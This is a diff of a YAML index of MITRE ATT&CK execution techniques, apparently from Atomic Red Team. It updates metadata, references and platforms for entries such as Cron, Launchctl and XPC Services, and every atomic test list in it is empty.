-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+      created: '2020-06-23T19:12:24.924Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/007
+        external_id: T1059.007
+      - source_name: Apple About Mac Scripting 2016
+        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+          14, 2021.
+        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+      - source_name: MDSec macOS JXA and VSCode
+        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+          with VSCode Extensions. Retrieved April 20, 2021.
+        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+      - source_name: Microsoft JScript 2007
+        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+          ECMAScript …. Retrieved June 23, 2020.
+        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+      - source_name: Microsoft Windows Scripts
+        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+      - source_name: JScrip May 2018
+        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+      - source_name: NodeJS
+        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+        url: https://nodejs.org/
+      - source_name: SentinelOne macOS Red Team
+        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+          APIs Without Building Binaries. Retrieved July 17, 2020.'
+        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+      - source_name: SpecterOps JXA 2020
+        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+          2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: Red Canary Silver Sparrow Feb2021
+        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+          wings: Outing macOS malware before it takes flight. Retrieved April 20,
+          2021.'
+        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1059.007
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -24520,9 +24840,8 @@ execution:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1559.002:
@@ -24614,20 +24933,19 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1559.002
     atomic_tests: []
   T1204.002:
     technique:
-      modified: '2023-04-21T12:22:19.740Z'
+      modified: '2024-09-25T20:50:34.876Z'
       name: 'User Execution: Malicious File'
       description: "An adversary may rely upon a user opening a malicious file in
         order to gain execution. Users may be subjected to social engineering to get
         them to open a file that will lead to code execution. This user action will
         typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
         Adversaries may use several types of files that require a user to execute
-        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
-        may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+        .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
         and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
         to increase the likelihood that a user will open and successfully execute
         a malicious file. These methods may include using a familiar naming convention
@@ -24655,7 +24973,7 @@ execution:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -24675,33 +24993,13 @@ execution:
         url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1204.002
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -24718,6 +25016,7 @@ execution:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -24728,9 +25027,13 @@ execution:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -24738,8 +25041,24 @@ execution:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1559.001:
@@ -24779,7 +25098,7 @@ execution:
         description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
           Application COM Object. Retrieved November 21, 2017.
         source_name: Enigma MMC20 COM Jan 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-07-26T22:51:20.448Z'
       name: Component Object Model
       description: |-
         Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as  [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
@@ -24804,12 +25123,10 @@ execution:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
       x_mitre_remote_support: true
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -24889,11 +25206,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.002:
     technique:
-      modified: '2024-03-01T19:06:05.126Z'
+      modified: '2024-10-15T14:18:20.087Z'
       name: 'Command and Scripting Interpreter: AppleScript'
       description: |-
         Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -24953,12 +25269,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.002
     atomic_tests: []
   T1106:
     technique:
-      modified: '2023-10-13T16:01:07.538Z'
+      modified: '2024-09-12T15:25:57.058Z'
       name: Native API
       description: |-
         Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -25056,9 +25371,9 @@ execution:
           2021.
         url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
       - source_name: Microsoft Win32
         description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
           March 15, 2020.
@@ -25075,19 +25390,18 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1106
     atomic_tests: []
   T1059.010:
     technique:
-      modified: '2024-04-10T16:05:22.456Z'
+      modified: '2024-04-28T15:58:48.119Z'
       name: AutoHotKey & AutoIT
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
         Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
 
-        These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+        These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
@@ -25096,7 +25410,7 @@ execution:
       - Liran Ravich, CardinalOps
       - Serhii Melnyk, Trustwave SpiderLabs
       - Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
-      - Monty
+      - "@_montysecurity"
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -25133,11 +25447,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:44:20.143Z'
       name: Cloud API
       description: "Adversaries may abuse cloud APIs to execute malicious commands.
         APIs available in cloud environments provide various functionalities and are
@@ -25174,11 +25487,10 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       x_mitre_remote_support: false
@@ -25197,13 +25509,12 @@ execution:
         url: https://github.com/Azure/azure-powershell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -25282,12 +25593,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests: []
   T1059:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Command and Scripting Interpreter
       description: |-
         Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -25298,6 +25608,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -25308,16 +25619,16 @@ execution:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      - Office 365
-      - Azure AD
       - IaaS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
@@ -25348,14 +25659,11 @@ execution:
         url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059
     atomic_tests: []
   T1609:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:25:45.507Z'
       name: Kubernetes Exec Into Container
       description: |-
         Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
@@ -25421,39 +25729,13 @@ execution:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1609
     atomic_tests: []
   T1569.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
-      type: attack-pattern
-      created: '2020-03-10T18:26:56.187Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569.001
-        url: https://attack.mitre.org/techniques/T1569/001
-      - source_name: Launchctl Man
-        url: https://ss64.com/osx/launchctl.html
-        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
-      - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
-        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
-          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
-        source_name: Sofacy Komplex Trojan
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-20T20:14:35.179Z'
       name: 'System Services: Launchctl'
       description: |
         Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
@@ -25462,6 +25744,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
         plist file on disk which can be monitored. Monitor for recently modified or
         created plist files with a significant change to the executable path executed
@@ -25474,19 +25757,42 @@ execution:
         are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
         or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
         the services are unloaded prior to deleting plist files."
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
       - 'Service: Service Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+      created: '2020-03-10T18:26:56.187Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569/001
+        external_id: T1569.001
+      - source_name: Sofacy Komplex Trojan
+        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+        url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      - source_name: Launchctl Man
+        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+        url: https://ss64.com/osx/launchctl.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1569.001
     atomic_tests: []
   T1059.008:
@@ -25529,7 +25835,7 @@ execution:
         data, modify startup configuration parameters to load malicious system software,
         or to disable security features or logging to avoid detection.(Citation: Cisco
         Synful Knock Evolution)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T20:28:09.848Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Device CLI
       x_mitre_detection: |-
@@ -25545,72 +25851,75 @@ execution:
       x_mitre_remote_support: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1559.003:
     technique:
-      x_mitre_platforms:
-      - macOS
+      modified: '2024-10-16T16:14:12.793Z'
+      name: XPC Services
+      description: |-
+        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_contributors:
+      - Csaba Fitzl @theevilbit of Kandji
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Csaba Fitzl @theevilbit of Offensive Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      x_mitre_remote_support: false
       type: attack-pattern
       id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
       created: '2021-10-12T06:45:36.763Z'
-      x_mitre_version: '1.0'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1559.003
         url: https://attack.mitre.org/techniques/T1559/003
+        external_id: T1559.003
       - source_name: creatingXPCservices
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
         description: Apple. (2016, September 9). Creating XPC Services. Retrieved
           April 19, 2022.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
       - source_name: Designing Daemons Apple Dev
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
         description: Apple. (n.d.). Retrieved October 12, 2021.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
       - source_name: CVMServer Vuln
-        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
         description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
           in macOS and iOS. Retrieved October 12, 2021.'
+        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
       - source_name: Learn XPC Exploitation
-        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
         description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
           October 12, 2021.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
-        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XPC Services
-      x_mitre_detection: ''
-      kill_chain_phases:
-      - phase_name: execution
-        kill_chain_name: mitre-attack
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204:
     technique:
-      modified: '2024-04-12T03:46:49.507Z'
+      modified: '2024-11-11T18:52:12.103Z'
       name: User Execution
       description: |-
         An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
 
         While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
 
